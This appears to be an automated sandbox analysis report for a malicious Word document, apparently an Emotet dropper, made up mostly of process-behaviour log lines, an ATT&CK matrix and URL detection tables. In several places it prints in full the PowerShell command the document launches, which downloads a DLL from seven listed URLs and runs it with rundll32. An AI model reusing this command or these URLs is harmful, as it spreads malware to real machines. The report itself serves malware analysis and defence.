Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FF00270F3C sldt word ptr [eax]4_2_000007FF00270F3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000004.00000002.426548508.000000000031E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter111Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1711.doc40%VirustotalBrowse
1711.doc20%MetadefenderBrowse
1711.doc58%ReversingLabsDocument-Word.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://yougandan.com/backup0%Avira URL Cloudsafe
http://alfadandoinc.com/67oyp/C2h0%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/P100%Avira URL Cloudmalware
http://thepilatesstudionj.com/wp-content/oAx5UoQm0%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nN0%Avira URL Cloudsafe
http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/100%Avira URL Cloudmalware
http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/100%Avira URL Cloudmalware
http://www.caboturnup.c0%Avira URL Cloudsafe
https://staviancjs.com/wp-forum/QOm4n2/100%Avira URL Cloudmalware
http://www.%s.comPA0%URL Reputationsafe
https://staviancjs.com/wp-forum/QOm40%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/100%Avira URL Cloudmalware
http://alfadandoinc.com/67oyp/C2J2KyCpQn0%Avira URL Cloudsafe
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PE100%Avira URL Cloudmalware
http://thepilatesstudionj.com/wp0%Avira URL Cloudsafe
http://www.caboturnup.com/wp-content/p0%Avira URL Cloudsafe
https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNc0%Avira URL Cloudsafe
http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZg0%Avira URL Cloudsafe
https://staviancjs.co0%Avira URL Cloudsafe
https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/0%Avira URL Cloudsafe
http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/100%Avira URL Cloudmalware
http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://yougandan.com/backuppowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
  • Avira URL Cloud: safe
unknown
http://alfadandoinc.com/67oyp/C2hpowershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Ppowershell.exe, 00000004.00000002.427629821.0000000002E7C000.00000004.00000001.sdmptrue
  • Avira URL Cloud: malware
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpfalse
    		high
    http://thepilatesstudionj.com/wp-content/oAx5UoQmpowershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmptrue
    • Avira URL Cloud: safe
    		unknown
